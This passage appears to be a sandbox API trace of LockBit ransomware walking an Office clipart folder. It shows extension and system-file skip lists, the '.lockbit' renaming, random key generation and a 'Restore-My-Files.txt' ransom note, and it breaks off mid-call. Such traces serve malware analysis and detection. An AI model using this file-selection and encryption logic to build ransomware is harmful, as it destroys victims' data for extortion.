[0113.775] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0113.775] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0113.775] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0113.775] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0113.775] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0113.776] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0113.776] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EXPLR_01.MID") returned 1 [0113.777] lstrcmpiW (lpString1="ntldr", lpString2="EXPLR_01.MID") returned 1 [0113.777] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EXPLR_01.MID") returned 1 [0113.777] lstrcmpiW (lpString1="bootsect.bak", lpString2="EXPLR_01.MID") returned -1 [0113.777] lstrcmpiW (lpString1="autorun.inf", lpString2="EXPLR_01.MID") returned -1 [0113.777] lstrcmpiW (lpString1="thumbs.db", lpString2="EXPLR_01.MID") returned 1 [0113.777] lstrcmpiW (lpString1="iconcache.db", lpString2="EXPLR_01.MID") returned 1 [0113.777] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.777] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned=".MID" [0113.777] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0113.777] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0113.777] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0113.778] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0113.778] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0113.778] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.lockbit") returned 72 [0113.779] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.780] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.780] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.780] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10562) returned 1 [0113.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.781] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.786] malloc (_Size=0xa6) returned 0x77d7a8 [0113.793] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.793] free (_Block=0x77d7a8) [0113.793] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.793] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.793] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x12ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="FALL_01.MID", cAlternateFileName="")) returned 1 [0113.793] lstrcmpiW (lpString1=".", lpString2="FALL_01.MID") returned -1 [0113.793] lstrcmpiW (lpString1="..", lpString2="FALL_01.MID") returned -1 [0113.793] PathFindExtensionW (pszPath="FALL_01.MID") returned=".MID" [0113.793] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0113.793] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0113.793] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0113.793] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0113.794] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0113.794] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0113.795] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0113.795] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FALL_01.MID") returned 1 [0113.795] lstrcmpiW (lpString1="ntldr", lpString2="FALL_01.MID") returned 1 [0113.795] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FALL_01.MID") returned 1 [0113.795] lstrcmpiW (lpString1="bootsect.bak", lpString2="FALL_01.MID") returned -1 [0113.795] lstrcmpiW (lpString1="autorun.inf", lpString2="FALL_01.MID") returned -1 [0113.795] lstrcmpiW (lpString1="thumbs.db", lpString2="FALL_01.MID") returned 1 [0113.795] lstrcmpiW (lpString1="iconcache.db", lpString2="FALL_01.MID") returned 1 [0113.796] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.796] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned=".MID" [0113.796] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0113.796] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0113.796] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0113.796] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0113.796] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0113.796] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0113.797] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0113.797] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.lockbit") returned 71 [0113.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.799] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.799] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.799] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4846) returned 1 [0113.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.800] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.807] malloc (_Size=0xa4) returned 0x77d7a8 [0113.807] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa4, FileInformationClass=0xa) returned 0xc0000008 [0113.812] free (_Block=0x77d7a8) [0113.812] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.813] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.813] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadef6200, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xadef6200, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00074_.WMF", cAlternateFileName="")) returned 1 [0113.813] lstrcmpiW (lpString1=".", lpString2="FD00074_.WMF") returned -1 [0113.813] lstrcmpiW (lpString1="..", lpString2="FD00074_.WMF") returned -1 [0113.813] PathFindExtensionW (pszPath="FD00074_.WMF") returned=".WMF" [0113.813] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.813] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.814] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.814] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00074_.WMF") returned 1 [0113.815] lstrcmpiW (lpString1="ntldr", lpString2="FD00074_.WMF") returned 1 [0113.815] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00074_.WMF") returned 1 [0113.815] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00074_.WMF") returned -1 [0113.815] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00074_.WMF") returned -1 [0113.815] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00074_.WMF") returned 1 [0113.815] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00074_.WMF") returned 1 [0113.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned=".WMF" [0113.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.815] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.815] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.816] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.817] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.lockbit") returned 72 [0113.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 